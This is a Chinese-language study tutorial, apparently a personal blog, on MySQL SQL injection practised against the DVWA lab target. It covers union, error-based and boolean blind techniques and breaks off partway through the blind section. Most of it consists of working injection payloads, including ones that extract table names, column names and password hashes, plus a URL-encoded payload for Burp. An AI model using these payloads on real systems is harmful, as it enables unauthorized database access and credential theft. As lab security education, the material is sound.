一 判断是数字型注入还是字符型注入
输入 1 and 1=1查询有两种情况: ①数字型注入 a.输入内容没有被网站做任何处理,能查询到; b.输入内容被网站做任何处理(比如id是int类型,语句对id的值加了引号处理),通过隐式转换还是能查询到; ②字符型注入:查询不到;
输入1 and 1=2查询有两种情况: ①数字型注入 a.输入内容没有被网站做任何处理,查询不到; b.输入内容被网站做任何处理(比如id是int类型,语句对id的值加了引号处理),通过隐式转换还是能查询到; ②字符型注入:查询不到; |
免责声明 本文仅是个人对SQL注入的学习测试过程记录,不具有恶意引导意向。 |
二 联合注入
1.判断是否存在注入,注入是字符型还是整数型 2.猜解SQL查询语句中的字段数(order by) 3.确定显示位 4.获取当前数据库(爆库) 5.获取数据库中的表(爆表) 6.获取表中的字段名(爆字段) 7.下载数据(爆数据) |
注意:union 和union all的区别
使用select 1,2演示union 和union all的区别(字段名是1和2) |
select 1,2; |
select 1,2 union select 1,2; |
select 1,2 union all select 1,2; |
说明:以下章节的联合注入没有使用union all
2.1 爆破库名
$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; |
查询为空:1' and 1=2# |
有查询结果: 1' or 1=2# |
2.1.1 后端查询
select database(); 说明:确认当前库 |
select first_name,last_name from users where user_id='1'; 说明:配合前端菜单根据查询id获取用户名 |
select first_name,last_name from users where user_id='1' union select 1,2; |
select first_name,last_name from users where user_id='-1' union select 1,2; 说明1:user_id取一个不可能存在的值,使查询结果只显示占位符 说明2:之所以使查询结果只显示占位符,因为前端页面显示限制可能回显不了太多内容,尽量使查询回显减少 |
select first_name,last_name from users where user_id='-1' union select user(),database(); |
2.1.2 前台查询
1' union select 1,2# 说明1:源码:WHERE user_id = '$id' 说明2:需要逃逸原有的引号范围,使联合语句生效回显查询结果; 说明3:1后边的引号使$id前边的引号闭合,#使$id后边的引号被注释 说明4:#是sql语句中的注释,注释后边的内容 |
1 union select 1,2 说明1:虽然有查询回显,是因为user_id本身是int类型;同时源码中对user_id的值做了引号处理'1 union select 1,2',使输入整体是个字符串,mysql做隐式抓换,取'1 union select 1,2'字符串前几位中非字符的字符串转换为int类型,实际查询的是user_id='1' |
-1' union select 1,2# |
2.1.3 组合前后端语句
前端:-1' union select 1,2# 后端:select first_name,last_name from users where user_id='-1' union select user(),database(); |
组合成前端payload:-1' union select user(),database()# |
前端查询payload:-1' union select user(),database()# 说明:配合union联合注入实现user()和database()查询回显 |
2.2 爆破表名
MySQL 5.0以上版本,存在一个自带的数据库名为:information_schema(重点)。
SCHEMATA:表里包含所有数据库的名字 TABLES:表里包含所有数据库的所有表 COLUMNS:表里包含所有数据库的所有表的所有字段 |
2.2.1 后端查询
mysql> use information_schema |
desc SCHEMATA; 说明:表结构 |
select SCHEMA_NAME from SCHEMATA; 说明:所有数据库的库名 |
select group_concat(schema_name) from schemata; 说明:合并列的输出为一行 |
desc TABLES; 说明:表结构 |
select TABLE_SCHEMA,TABLE_NAME from TABLES where TABLE_SCHEMA='dvwa'; 说明:dvwa库里的所有表名 |
select TABLE_SCHEMA,group_concat(TABLE_NAME) from TABLES where TABLE_SCHEMA='dvwa'; 说明:合并dvwa库里的表名列为一行 |
desc COLUMNS; 说明:表结构 |
select TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME from COLUMNS where TABLE_SCHEMA='dvwa' and TABLE_NAME='users'; 说明:dvwa库里users表里的所有字段 |
select TABLE_SCHEMA,TABLE_NAME,group_concat(COLUMN_NAME) from COLUMNS where TABLE_SCHEMA='dvwa' and TABLE_NAME='users'; 说明:dvwa库的users表所有列名合并为一行 |
use dvwa; select first_name,last_name from users where user_id='1' union select 1,2; 说明:联合查询配合占位符 |
2.2.2 前台查询
Payload:1' union select 1,2# |
$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; 说明:源码 |
select first_name,last_name from users where user_id='1' union select 1,2#; 说明:源码代入联合注入后端查询效果 |
2.2.3 组合前后端语句
前端:select first_name,last_name from users where user_id='1' union select 1,2#; |
后端: select TABLE_SCHEMA,group_concat(TABLE_NAME) from TABLES where TABLE_SCHEMA='dvwa'; 组合前后端语句后: >use dvwa >select first_name,last_name from users where user_id='1' union select 1,group_concat(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA='dvwa'#; |
>use dvwa >select first_name,last_name from users where user_id='-1' union select 1,group_concat(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA='dvwa'#; 说明1:user_id=’-1’减少union联合查询中左侧查询的输出 说明2:#是sql语句中的注释,注释后边的内容 |
最终:组合前后端语句的payload: -1' union select 1,group_concat(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA='dvwa'# |
2.3 爆破字段名
2.3.1 后端查询
desc COLUMNS; 说明:表结构 |
select TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME from COLUMNS where TABLE_SCHEMA='dvwa' and TABLE_NAME='users'; 说明:dvwa库里users表里的所有字段 |
select TABLE_SCHEMA,TABLE_NAME,group_concat(COLUMN_NAME) from COLUMNS where TABLE_SCHEMA='dvwa' and TABLE_NAME='users'; 说明:dvwa库的users表所有列名合并为一行 |
2.3.2 前台查询
Payload:1' union select 1,2# |
$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; 说明:源码 |
select first_name,last_name from users where user_id='1' union select 1,2#; 说明:源码代入联合注入后端查询效果 |
2.3.3 组合前后端语句
前端:select first_name,last_name from users where user_id='1' union select 1,2#; |
后端: select TABLE_SCHEMA,TABLE_NAME,group_concat(COLUMN_NAME) from information_schema.COLUMNS where TABLE_SCHEMA='dvwa' and TABLE_NAME='users'; |
组合前后端语句后: select first_name,last_name from users where user_id='1' union select 1,group_concat(COLUMN_NAME) from information_schema.COLUMNS where TABLE_SCHEMA='dvwa' and TABLE_NAME='users'#; |
select first_name,last_name from users where user_id='-1' union select 1,group_concat(COLUMN_NAME) from information_schema.COLUMNS where TABLE_SCHEMA='dvwa' and TABLE_NAME='users'#; 说明1:user_id=’-1’减少union联合查询中左侧查询的输出 说明2:#是sql语句中的注释,注释后边的内容 |
最终:组合前后端语句的payload: -1' union select 1,group_concat(COLUMN_NAME) from information_schema.COLUMNS where TABLE_SCHEMA='dvwa' and TABLE_NAME='users'# |
2.4 爆破数据
2.4.1 后端查询
select first_name,last_name from users where user_id='1' union select user,password from dvwa.users; |
select first_name,last_name from users where user_id='-1' union select user,password from dvwa.users; 说明:user_id='-1' 查询一个不存在的id,减少union左侧的输出,只保留union右侧的输出 |
2.4.2 前台查询
Payload:1' union select 1,2# |
$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; 说明:源码 |
select first_name,last_name from users where user_id='1' union select 1,2#; 说明:源码代入联合注入后端查询效果 |
2.4.3 组合前后端语句
前端:select first_name,last_name from users where user_id='1' union select 1,2#; |
后端: select first_name,last_name from users where user_id='-1' union select user,password from dvwa.users; |
组合前后端语句后: select first_name,last_name from users where user_id='-1' union select user,password from dvwa.users#; 说明1:user_id=’-1’减少union联合查询中左侧查询的输出 说明2:#是sql语句中的注释,注释后边的内容 |
最终:组合前后端语句的payload: -1' union select user,password from dvwa.users# |
2.4.4 MD5解码说明
三 报错注入
注意1:报错注入是根据制造报错使注入语句查询结果随报错信息一起回显,但是报错信息的长度往往是有限制的,显示的报错信息不是无限长的 |
注意2:另如果程序做了处理了,前台不回显报错日志,那么报错注入将无法实现 |
注意3:本次练习是在dvwa靶场Low级别环境,可以完成报错注入练习 |
常用的特殊字符:' \ ; %00 ) ( # " |
①extractvalue(XML_document,xpath_string) 此函数从目标XML文档中返回包含所查询值的字符串,如果string参数不符合xpath的语法就会报错,将查询结果放在报错信息里,即extractvalue函数报错时会解析SQL语句。 第一个参数:string格式,为XML文档对象的名称; 第二个参数:xpath_string(xpath格式的字符串),为XML文档的路径; extractvalue使用时若xpath_string格式出现错误,mysql则会爆出xpath语法错误(xpath syntax error) 由于0x7e(十六进制)就是~,~不属于xpath语法格式,因此报出xpath语法错误。 |
②updatexml(XML_document,xpath_string,new_value) 三个参数关注第二个参数xpath_string,和extractvalue类似 |
3.0 extractvalue示例
select first_name,last_name from users where user_id='1' and extractvalue(1,'2'); 说明1:查询正常,有记录输出 |
select first_name,last_name from users where user_id='1' and extractvalue(1,'a'); 说明:查询正常,无记录输出 |
select first_name,last_name from users where user_id='1' and extractvalue(1,'?'); select first_name,last_name from users where user_id='1' and extractvalue(1,'@'); select first_name,last_name from users where user_id='1' and extractvalue(1,'~'); 说明:语法报错:Xpath syntax error |
select first_name,last_name from users where user_id='1' and extractvalue(1,0x7e); 说明:0x7e是‘~’的十六进制形式 |
select 1,extractvalue(1,'2'); |
select user from users where extractvalue(1,'2') is false; select user from users where extractvalue(1,'2') is true; 说明:从结果来看,extractvalue(1,'2')的结果为true; |
3.1 爆破库名
3.1.1 后端查询
①select extractvalue(1,0x7e); |
② select extractvalue(1,database()); 说明:database()函数作为extractvalue()函数的参数没有报错 |
③ select extractvalue(1,user()); 说明1:此处可看出extractvalue第二个参数user()函数被正常执行了,由于user()函数输出中包含特殊符号“@”,被判xpath格式错误,执行语句报错 |
④select extractvalue(1,concat(0x7e,database())); 说明1:extractvalue()函数支持2个参数,参考②③,需要在暴库时把database()查询结果变为错误结果输出,这里使用concat()函数,把0x7e(‘~’)和database()结果组合起来作为一个参数,通过特殊符号’~’参数报错,把database()结果通过报错显示出来 |
3.1.2 前台查询
Payload:1' and 1=1# |
$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; 说明:源码 |
select first_name,last_name from users where user_id='1' and 1=1#; 说明:源码代入联合注入后端查询效果 |
3.1.3 组合前后端语句
前端:select first_name,last_name from users where user_id='1' and 1=1#; |
后端:select extractvalue(1,concat(0x7e,database())); |
组合查询语句: select first_name,last_name from users where user_id='1' and extractvalue(1,concat(0x7e,database()))#; |
最终:组合前后端语句的payload: 1' and extractvalue(1,concat(0x7e,database()))# |
3.2 爆破表名
MySQL 5.0以上版本,存在一个自带的数据库名为:information_schema(重点)。
SCHEMATA:表里包含所有数据库的名字 TABLES:表里包含所有数据库的所有表 COLUMNS:表里包含所有数据库的所有表的所有字段 |
3.2.1 后端查询
①select TABLE_NAME from information_schema.tables where TABLE_SCHEMA='dvwa'; |
②select count(TABLE_NAME) from information_schema.tables where TABLE_SCHEMA='dvwa'; 说明:dvwa库的表数量 |
③select group_concat(TABLE_NAME) from information_schema.tables where TABLE_SCHEMA='dvwa'; 说明:dvwa库的表名称 |
④select extractvalue(1,concat(0x7e,(select group_concat(TABLE_NAME) from information_schema.tables where TABLE_SCHEMA='dvwa'))); 说明1:concat()函数的第二个参数是一条完整sql语句,需要括号括起来 说明2:配合extractvalue()函数制造报错:XPATH syntax error: ‘~guestbook,users’ |
①select TABLE_NAME from information_schema.tables where TABLE_SCHEMA='dvwa'; |
②select TABLE_NAME from information_schema.tables where TABLE_SCHEMA='dvwa' limit 0,1; |
③select TABLE_NAME from information_schema.tables where TABLE_SCHEMA='dvwa' limit 1,1 |
④select extractvalue(1,concat(0x7e,(select TABLE_NAME from information_schema.tables where TABLE_SCHEMA='dvwa' limit 1,1))); |
3.2.2 前台查询
Payload:1' and 1=1# |
$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; 说明:源码 |
select first_name,last_name from users where user_id='1' and 1=1#; 说明:源码代入联合注入后端查询效果 |
3.2.3 组合前后端语句
前端:select first_name,last_name from users where user_id='1' and 1=1#; |
后端1: select extractvalue(1,concat(0x7e,(select group_concat(TABLE_NAME) from information_schema.tables where TABLE_SCHEMA='dvwa'))); |
后端2: select extractvalue(1,concat(0x7e,(select TABLE_NAME from information_schema.tables where TABLE_SCHEMA='dvwa' limit 1,1))); |
组合查询语句1: select first_name,last_name from users where user_id='1' and extractvalue(1,concat(0x7e,(select group_concat(TABLE_NAME) from information_schema.tables where TABLE_SCHEMA='dvwa')))#; |
组合查询语句2: select first_name,last_name from users where user_id='1' and extractvalue(1,concat(0x7e,(select TABLE_NAME from information_schema.tables where TABLE_SCHEMA='dvwa' limit 1,1)))#; |
最终:组合前后端语句的payload1: ①1' and extractvalue(1,concat(0x7e,(select group_concat(TABLE_NAME) from information_schema.tables where TABLE_SCHEMA='dvwa')))# |
最终:组合前后端语句的payload2: ②1' and extractvalue(1,concat(0x7e,(select TABLE_NAME from information_schema.tables where TABLE_SCHEMA='dvwa' limit 1,1)))# |
3.2.4 burp辅助爆破
①3.2.3章节payload1转换为url编码 %31%27%61%6e%64%20%65%78%74%72%61%63%74%76%61%6c%75%65%28%31%2c%63%6f%6e%63%61%74%28%30%78%37%65%2c%28%73%65%6c%65%63%74%20%67%72%6f%75%70%5f%63%6f%6e%63%61%74%28%54%41%42%4c%45%5f%4e%41%4d%45%29%20%66%72%6f%6d%20%69%6e%66%6f%72%6d%61%74%69%6f%6e%5f%73%63%68%65%6d%61%2e%74%61%62%6c%65%73%20%77%68%65%72%65%20%54%41%42%4c%45%5f%53%43%48%45%4d%41%3d%27%64%76%77%61%27%29%29%29%23 |
②抓包拦截重新组包并发送 |
3.3 爆破字段名
3.3.1 后端查询
①select column_name from information_schema.columns where table_schema='dvwa' and table_name='users'; 说明:根据information_schema.columns表获取dvwa库users表的字段名 |
②select group_concat(column_name) from information_schema.columns where table_schema='dvwa' and table_name='users'; 说明:group_concat()函数合并查询结果 |
③select count(column_name) from information_schema.columns where table_schema='dvwa' and table_name='users'; 说明:查询dvwa库users表中字段名数量 |
④select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 3,1; 说明:使用limit x,y 分别取出字段名 |
⑤select extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='dvwa' and table_name='users'))); 说明:从报错截图看出,报错内容长度有限制,sql报错注入查询内容太长无法显示完整 |
⑥select extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 3,1))); 说明:推荐使用limit x,y方式一个一个获取字段名 |
3.3.2 前台查询
Payload:1' and 1=1# |
$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; 说明:源码 |
select first_name,last_name from users where user_id='1' and 1=1#; 说明:源码代入联合注入后端查询效果 |
3.3.3 组合前后端语句
前端:select first_name,last_name from users where user_id='1' and 1=1#; |
后端: select extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 3,1))); |
组合后查询语句: select first_name,last_name from users where user_id='1' and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 3,1)))#; |
最终:组合前后端语句的payload: 1' and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 3,1)))# |
3.4 爆破数据
3.4.1 后端查询寻
①select user from users where user_id='1'; |
②select password from users where user_id='1'; |
③select length(password) from users where user_id='1'; |
④select extractvalue(1,concat(0x7e,(select user from users where user_id='1'))); 说明:制造报错输入user_id=1的user值 |
⑤select extractvalue(1,concat(0x7e,(select password from users where user_id='1'))); 说明1:制造报错输入user_id=1的password值 说明2:报错输出的password值长度显然没有③步骤统计的字符长度长(受报错信息长度限制输出不完整) |
⑥使用substr(目标,n,m)分段对目标字段值报错注入获取 select extractvalue(1,concat(0x7e,(select substr(password,1,16) from users where user_id='1'))); select extractvalue(1,concat(0x7e,(select substr(password,17,16) from users where user_id='1'))); |
3.4.2 前台查询
Payload:1' and 1=1# |
$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; 说明:源码 |
select first_name,last_name from users where user_id='1' and 1=1#; 说明:源码代入联合注入后端查询效果 |
3.4.3 组合前后端语句
前端:select first_name,last_name from users where user_id='1' and 1=1#; |
后端: select extractvalue(1,concat(0x7e,(select substr(password,1,16) from users where user_id='1'))); select extractvalue(1,concat(0x7e,(select substr(password,17,16) from users where user_id='1'))); |
组合后查询语句: select first_name,last_name from users where user_id='1' and extractvalue(1,concat(0x7e,(select substr(password,1,16) from users where user_id='1')))#; |
select first_name,last_name from users where user_id='1' and extractvalue(1,concat(0x7e,(select substr(password,17,16) from users where user_id='1')))#; |
最终:组合前后端语句的payload: 1' and extractvalue(1,concat(0x7e,(select substr(password,1,16) from users where user_id='1')))# |
1' and extractvalue(1,concat(0x7e,(select substr(password,17,16) from users where user_id='1')))# |
四 问题总结
4.1 extractvalue函数中,为什么'~'写在参数1的位置不报错,而写在参数2的位置报错?
在 EXTRACTVALUE函数中,'~'(波浪号)字符在参数位置的表现取决于该字符在 XML 和 XPath上下文中的意义和用法。EXTRACTVALUE函数通常用于从XML数据中提取信息,它接受两个参数:一个XML数据片段和一个XPath表达式。(internet上查证如下:)
●参数1(XML 数据片段): 这个参数应该包含有效的 XML 数据。 如果 '~' 是这个参数的一部分,并且 XML 解析器能够处理它(例如,如果它是 XML 数据中的一个合法字符,比如作为文本内容的一部分),那么它通常不会导致错误。但是,如果 '~' 破坏了 XML 的结构(比如,如果它出现在标签名、属性名或不应该出现的地方),那么 XML 解析器会报错。 ●参数2(XPath 表达式): 这个参数应该是一个有效的 XPath 表达式。 XPath 表达式遵循特定的语法规则,'~' 并不是 XPath 语法中的一部分。如果 '~' 出现在 XPath 表达式中,并且不符合 XPath 的语法规则,那么 XPath 解析器会报错。 |
①select extractvalue('<book>shuxue</book>','/book'); 说明:正常语句 |
②select extractvalue('<book>shuxue~</book>','/book'); 说明:‘~’作为XML文本内容的一部分,匹配XPATN表达输出正常 |
③select extractvalue('<book>shuxue</~book>','/book'); 说明:‘~’作为XML标签的组成部分,匹配XPATH表达式输出为NULL,好像也不算报错 |
④select extractvalue('<book>shuxue</book>','/book~'); 说明:‘~’作为XPATH表达式的组成部分,不符合规范,产生报错 |
4.2 报错注入中,为什么要突破单引号的限制,如何突破?
4.3 在报错注入过程中,为什么要进行报错,是哪种类型的报错?
五 盲注
时间盲注:界面返回值只有一种 True,无论输入任何值,返回情况都会按正常来处理。加入特定的时间函数,通过查看WEB页面返回的时间差来判断注入的语句是否正确。
注意:通过盲注最终实现获取数据的过程,耗时巨久 |
分析是数字型注入还是字符型注入:根据输入以下内容总是放回:“User ID exists in the database.”或“User ID is MISSING from the database.”。
序号 |
User ID输入语句 |
结果 |
① |
1 |
exists |
② |
1 and 1=1 |
exists |
③ |
1 and 1=2 |
exists |
④ |
1' and 1=1# |
exists |
⑤ |
1' and 1=2# |
盲注思想:由于布尔盲注没有明显回显提示,只有true和false,所以需要先确定库名长度(length()函数)(二分法),在通过截取(substr())函数取出每一位字符再转换为ascii码值与ascii码表比较大小确认每一位字符。 |
控制字符 |
控制字符 |
控制字符 |
控制字符 |
32 |
(space) |
56 |
8 |
80 |
P |
104 |
h |
33 |
! |
57 |
9 |
81 |
Q |
105 |
i |
34 |
" |
58 |
: |
82 |
R |
106 |
j |
35 |
# |
59 |
; |
83 |
S |
107 |
k |
36 |
$ |
60 |
< |
84 |
T |
108 |
l |
37 |
% |
61 |
= |
85 |
U |
109 |
m |
38 |
& |
62 |
> |
86 |
V |
110 |
n |
39 |
, |
63 |
? |
87 |
W |
111 |
o |
40 |
( |
64 |
@ |
88 |
X |
112 |
p |
41 |
) |
65 |
A |
89 |
Y |
113 |
q |
42 |
* |
66 |
B |
90 |
Z |
114 |
r |
43 |
+ |
67 |
C |
91 |
[ |
115 |
s |
44 |
, |
68 |
D |
92 |
/ |
116 |
t |
45 |
- |
69 |
E |
93 |
] |
117 |
u |
46 |
. |
70 |
F |
94 |
^ |
118 |
v |
47 |
/ |
71 |
G |
95 |
_ |
119 |
w |
48 |
0 |
72 |
H |
96 |
、 |
120 |
x |
49 |
1 |
73 |
I |
97 |
a |
121 |
y |
50 |
2 |
74 |
J |
98 |
b |
122 |
z |
51 |
3 |
75 |
K |
99 |
c |
123 |
{ |
52 |
4 |
76 |
L |
100 |
d |
124 |
| |
53 |
5 |
77 |
M |
101 |
e |
125 |
} |
54 |
6 |
78 |
N |
102 |
f |
126 |
` |
55 |
7 |
79 |
O |
103 |
g |
127 |
5.1 爆破库名
5.1.1 后端查询 确认库名长度
select database(); |
select length(database()); |
二分法判断库名length |
select length(database()) >10; |
select length(database()) >5; |
select length(database()) >3; |
select length(database()) =4; |
可以判断库名长度为4 | 确定库名每一位字符
substr(strings|express,num start,num length); strings|express:被截取的字符串或字符串表达式;start为起始位置;length为长度 |
select ascii(substr(database(),1,1)) >98; |
select ascii(substr(database(),1,1)) >99; |
select ascii(substr(database(),1,1)) >100; |
select ascii(substr(database(),1,1)) =100; |
判断出库名的第一个字符为d;以此类推获取库名为dvwa |
5.1.2 前台查询
Payload:1' and 1=1# |
源码:SELECT first_name, last_name FROM users WHERE user_id = '$id'; |
SELECT first_name, last_name FROM users WHERE user_id = '1' and 1=1#'; |
5.1.3 组合前后端语句 确认库名长度
前端:SELECT first_name, last_name FROM users WHERE user_id = '1' and 1=1#'; |
后端:select length(database()) =4; |
组合前后端语句: SELECT first_name, last_name FROM users WHERE user_id = '1' and length(database()) =4#'; |
最终:组合前后端语句的payload: 1' and length(database()) =4# | 确认库名每一个字符
前端:SELECT first_name, last_name FROM users WHERE user_id = '1' and 1=1#'; |
后端:select ascii(substr(database(),1,1)) =100; |
组合前后端语句: SELECT first_name, last_name FROM users WHERE user_id = '1' and ascii(substr(database(),1,1)) =100#'; |
最终:组合前后端语句的payload: 1' and ascii(substr(database(),1,1)) =100#' |
以此类推得出库名为dvwa |
5.2 爆破表名
5.2.1 后端查询 确认表数量
select count(TABLE_NAME) from information_schema.tables where TABLE_SCHEMA=database(); | 确认每个表的长度
①select length(TABLE_NAME) from information_schema.tables where TABLE_SCHEMA=database() limit 1,1; |
①select length(TABLE_NAME)=5 from information_schema.tables where TABLE_SCHEMA=database() limit 1,1; |
②select length((select TABLE_NAME from information_schema.tables where TABLE_SCHEMA=database() limit 1,1)); |
②select length((select TABLE_NAME from information_schema.tables where TABLE_SCHEMA=database() limit 1,1)) =5; |
两种写法都可以获取表长度为5 | 确定表名的每一个字符
①select ascii(substr(TABLE_NAME,1,1)) from information_schema.tables where TABLE_SCHEMA=database() limit 1,1; |
①select ascii(substr(TABLE_NAME,1,1))=117 from information_schema.tables where TABLE_SCHEMA=database() limit 1,1; |
②select ascii(substr((select TABLE_NAME from information_schema.tables where TABLE_SCHEMA=database() limit 1,1),1,1)); |
②select ascii(substr((select TABLE_NAME from information_schema.tables where TABLE_SCHEMA=database() limit 1,1),1,1)) =117; |
两种写法都可以获取表第一个字符为117-u,以此类推得出表名users |
5.2.2 前台查询
Payload:1' and 1=1# |
源码:SELECT first_name, last_name FROM users WHERE user_id = '$id'; |
SELECT first_name, last_name FROM users WHERE user_id = '1' and 1=1#'; |
5.2.3 组合前后端语句 确认表数量
前端:SELECT first_name, last_name FROM users WHERE user_id = '1' and 1=1#'; |
后端: select count(TABLE_NAME) from information_schema.tables where TABLE_SCHEMA=database(); |
组合前后端语句:两种 |
①SELECT first_name, last_name FROM users WHERE user_id = '1' and (select count(TABLE_NAME) from information_schema.tables where TABLE_SCHEMA=database())=2#'; |
②SELECT first_name, last_name FROM users WHERE user_id = '1' and (select count(TABLE_NAME)=2 from information_schema.tables where TABLE_SCHEMA=database())#'; |
最终:组合前后端语句的payload:两种 |
①1' and (select count(TABLE_NAME) from information_schema.tables where TABLE_SCHEMA=database())=2# |
②1' and (select count(TABLE_NAME)=2 from information_schema.tables where TABLE_SCHEMA=database())# |
利用二分法确认表的数量是2;(步骤中没有体现二分法的一一列举,可自行调整“=2”的参数验证) | 确认表的长度
前端:SELECT first_name, last_name FROM users WHERE user_id = '1' and 1=1#'; |
后端1: select length(TABLE_NAME) from information_schema.tables where TABLE_SCHEMA=database() limit 1,1; |
后端2: select length(TABLE_NAME)=5 from information_schema.tables where TABLE_SCHEMA=database() limit 1,1; |
后端3: select length((select TABLE_NAME from information_schema.tables where TABLE_SCHEMA=database() limit 1,1)) =5; |
组合前后端语句:三种 |
①SELECT first_name, last_name FROM users WHERE user_id = '1' and (select length(TABLE_NAME) from information_schema.tables where TABLE_SCHEMA=database() limit 1,1)=5#'; |
②SELECT first_name, last_name FROM users WHERE user_id = '1' and (select length(TABLE_NAME)=5 from information_schema.tables where TABLE_SCHEMA=database() limit 1,1)#'; |
③SELECT first_name, last_name FROM users WHERE user_id = '1' and length((select TABLE_NAME from information_schema.tables where TABLE_SCHEMA=database() limit 1,1)) =5#'; |
最终:组合前后端语句的payload:三种 |
①1' and (select length(TABLE_NAME) from information_schema.tables where TABLE_SCHEMA=database() limit 1,1)=5# |
②1' and (select length(TABLE_NAME)=5 from information_schema.tables where TABLE_SCHEMA=database() limit 1,1)# |
③1' and length((select TABLE_NAME from information_schema.tables where TABLE_SCHEMA=database() limit 1,1)) =5# |
依据二分法,以此类推得出表名的长度为5;(步骤中没有体现二分法的一一列举,可自行调整“=5”的参数验证) | 确认表名的每一个字符
前端:SELECT first_name, last_name FROM users WHERE user_id = '1' and 1=1#'; |
后端1: select ascii(substr(TABLE_NAME,1,1)) from information_schema.tables where TABLE_SCHEMA=database() limit 1,1 |
后端2: select ascii(substr(TABLE_NAME,1,1))=117 from information_schema.tables where TABLE_SCHEMA=database() limit 1,1; |
后端3: select ascii(substr((select TABLE_NAME from information_schema.tables where TABLE_SCHEMA=database() limit 1,1),1,1)) =117; |
组合前后端语句:三种 |
①SELECT first_name, last_name FROM users WHERE user_id = '1' and (select ascii(substr(TABLE_NAME,1,1)) from information_schema.tables where TABLE_SCHEMA=database() limit 1,1)=117#'; |
②SELECT first_name, last_name FROM users WHERE user_id = '1' and (select ascii(substr(TABLE_NAME,1,1))=117 from information_schema.tables where TABLE_SCHEMA=database() limit 1,1)#'; |
③SELECT first_name, last_name FROM users WHERE user_id = '1' and ascii(substr((select TABLE_NAME from information_schema.tables where TABLE_SCHEMA=database() limit 1,1),1,1)) =117#'; |
最终:组合前后端语句的payload:三种 |
①1' and (select ascii(substr(TABLE_NAME,1,1)) from information_schema.tables where TABLE_SCHEMA=database() limit 1,1)=117# |
②1' and (select ascii(substr(TABLE_NAME,1,1))=117 from information_schema.tables where TABLE_SCHEMA=database() limit 1,1)# |
③1' and ascii(substr((select TABLE_NAME from information_schema.tables where TABLE_SCHEMA=database() limit 1,1),1,1)) =117# |
得出表的第一个字符为u,以此类推得出表名users;(步骤中没有体现二分法的一一列举,可自行调整“=117”的参数验证) |
5.3 爆破字段名
5.3.1 后端查询 确认字段名数量
select count(COLUMN_NAME) from information_schema.COLUMNS where TABLE_SCHEMA=database() and TABLE_NAME='users'; |
二分法判断dvwa库uses表的字段数量(等于号可自行改为大于号或小于号验证) |
select count(COLUMN_NAME)=10 from information_schema.COLUMNS where TABLE_SCHEMA=database() and TABLE_NAME='users'; |
select count(COLUMN_NAME)=5 from information_schema.COLUMNS where TABLE_SCHEMA=database() and TABLE_NAME='users'; |
select count(COLUMN_NAME)=8 from information_schema.COLUMNS where TABLE_SCHEMA=database() and TABLE_NAME='users'; |
最终确认表users中字段数量为8 | 确认字段名长度
select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=database() and TABLE_NAME='users' limit 3,1; |
二分法判断字段名长度(步骤中没有体现二分法的一一列举,可自行调整“=4”的参数验证):二种方法 |
①select length(COLUMN_NAME)=4 from information_schema.COLUMNS where TABLE_SCHEMA=database() and TABLE_NAME='users' limit 3,1; |
②select length((select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=database() and TABLE_NAME='users' limit 3,1))=4; |
最终确认表长度为4 | 确认字段名每一个字符
select substr(COLUMN_NAME,1,1) from information_schema.COLUMNS where TABLE_SCHEMA=database() and TABLE_NAME='users' limit 3,1; |
二分法判断字段名每一个字符(步骤中没有体现二分法的一一列举,可自行调整“=117”的参数验证):二种方法 |
①select ascii(substr(COLUMN_NAME,1,1))=117 from information_schema.COLUMNS where TABLE_SCHEMA=database() and TABLE_NAME='users' limit 3,1; |
②select ascii(substr((select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=database() and TABLE_NAME='users' limit 3,1),1,1)); |
二分法得出字段的第一个字符为u,以此类推,最终确认字段名为user |
5.3.2 前台查询
Payload:1' and 1=1# |
源码:SELECT first_name, last_name FROM users WHERE user_id = '$id'; |
SELECT first_name, last_name FROM users WHERE user_id = '1' and 1=1#'; |
5.3.3 组合前后端语句 确认字段名数量
前端:SELECT first_name, last_name FROM users WHERE user_id = '1' and 1=1#'; |
后端: select count(COLUMN_NAME)=8 from information_schema.COLUMNS where TABLE_SCHEMA=database() and TABLE_NAME='users'; |
组合前后端语句:两种(说明and后边的值是true) |
①SELECT first_name, last_name FROM users WHERE user_id = '1' and (select count(COLUMN_NAME) from information_schema.COLUMNS where TABLE_SCHEMA=database() and TABLE_NAME='users')=8#'; |
②SELECT first_name, last_name FROM users WHERE user_id = '1' and (select count(COLUMN_NAME)=8 from information_schema.COLUMNS where TABLE_SCHEMA=database() and TABLE_NAME='users')#'; |
最终:组合前后端语句的payload:两种 |
①1' and (select count(COLUMN_NAME) from information_schema.COLUMNS where TABLE_SCHEMA=database() and TABLE_NAME='users')=8# |
②1' and (select count(COLUMN_NAME)=8 from information_schema.COLUMNS where TABLE_SCHEMA=database() and TABLE_NAME='users')# |
利用二分法确认字段的数量是8;(步骤中没有体现二分法的一一列举,可自行调整“=8”的参数验证) | 确认字段名长度
前端:SELECT first_name, last_name FROM users WHERE user_id = '1' and 1=1#'; |
后端1: select length(COLUMN_NAME) from information_schema.COLUMNS where TABLE_SCHEMA=database() and TABLE_NAME='users' limit 3,1; |
后端2: select length(COLUMN_NAME)=4 from information_schema.COLUMNS where TABLE_SCHEMA=database() and TABLE_NAME='users' limit 3,1; |
后端3: select length((select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=database() and TABLE_NAME='users' limit 3,1))=4; |
组合前后端语句:三种(有输出表示and后边的语句为true) |
